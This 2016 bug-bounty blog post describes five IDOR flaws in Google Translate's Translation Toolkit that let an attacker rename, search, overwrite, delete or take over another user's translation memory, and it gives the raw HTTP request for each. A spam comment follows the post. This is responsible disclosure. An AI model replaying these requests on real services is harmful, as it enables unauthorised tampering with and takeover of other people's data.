Wednesday 29 June 2016

5 IDORs in translate.google.com

Hello,

Shailesh here!

There is a module named "Translation Toolkit" in https://translate.google.com and i found that a sub-module named "Translation Memories" was fully vulnerable to IDOR vulnerabilities!

 I found 5 IDORs in Translation Memories.
 
1. IDOR to change name of victim's Translation Memory :
An attacker was able to change name of victim's translation memory because there was lack of proper ACLs at this endpoint.

HTTP Request :
POST /toolkit/utmname?hl=en HTTP/1.1
Host: translate.google.com
..

 security_token=AKrFfvIvi97LGuNHa3w_vpTZyWwPszzm5g%3A1467183119818&tmid=8a73972848d860ed&tmname=renamed_by_attacker

 2. IDOR to search from victim's Translation Memory :

 An attacker was able to search from victim's translation memory because there was lack of proper ACLs at this endpoint too.

HTTP Request :
POST /toolkit/gettm HTTP/1.1
Host: translate.google.com
...

hl=en&src=a&sl=en&tl=sq&tmids=1e0cd01b8a7bde44&thld=0&mofmt=true

3. IDOR to replace or add .tmx file into victim's Translation Memory : 

You may find something about .tmx file from Here. I used such .tmx file to add some data into victim's Translation Memory. I was able to replace or combine .tmx data into victim's translation memory because of lack of proper ACLs on uploading .tmx file into a Translation Memory.

 HTTP Request :
POST /toolkit/tmappend?hl=en HTTP/1.1
Host: translate.google.com
..

------WebKitFormBoundarymGTgNNHKz4FAMIdY
Content-Disposition: form-data; name="security_token"

AKrFfvKLf60q11l-TlCENLERqMD0KI9LAA:1447909448118
------WebKitFormBoundarymGTgNNHKz4FAMIdY
Content-Disposition: form-data; name="tmid"

07a132fa949ac969
------WebKitFormBoundarymGTgNNHKz4FAMIdY
Content-Disposition: form-data; name="tloc"; filename="my_memory (1).tmx"
Content-Type: application/octet-stream
<XML>...
------WebKitFormBoundarymGTgNNHKz4FAMIdY--

4. IDOR to delete victim's Translation Memory :

Yeah!!  Also, There was no ACLs at this endpoint. So an attacker was able to delete victim's translation memory using a simple IDOR mechanism.

 HTTP Request :
POST /toolkit/deletetm HTTP/1.1
Host: translate.google.com
..
hl=en&tmids=850b211b36c39a1e&security_token=AKrFfvKaPs2JVm4aGg8xLSyE_-o1RMc-Uw%3A1467184220688

5. IDOR to takeover victim's Translation Memory :

 There was no ACLs on sharing a Translation Memory with an user. So an attacker was able to share victim's Translation Memory with himself to be an owner of that particular Translation Memory.

 HTTP Request :
POST /toolkit/utminfo HTTP/1.1
Host: translate.google.com
Connection: keep-alive
Content-Length: 396
...


hl=en&tmid=1e0cd01b8a7bde44&acl=[{"access":7,"me":true,"email":"victim.dummy.4594@gmail.com"},{"access":7,"email":"attacker.dummy.4594@gmail.com"},{"email":"@gmail.com","access":7,"caa":false,"new":true}]&ntfy=true&copy=false&security_token=xxxxxx:144786375312

In short, i was able to modify victim's Translation Memory.
For all requests, tmid(s) was a vulnerable parameter!

That's all ;)

Due to low-sensitive data leakage, i received a combined bounty of $3133.7 from Google.




Thank you for reading!  :-)

-Shailesh Suthar


Posted by at

1 comment :

  1. Naveed Mughal3 May 2018 at 07:21

    Great job for publishing such a beneficial web site. Your web log isn’t only useful but it is additionally really creative too. There tend to be not many people who can certainly write not so simple posts that artistically. Continue the nice writing
    Translation services near me

    ReplyDelete

Subscribe to: Post Comments ( Atom )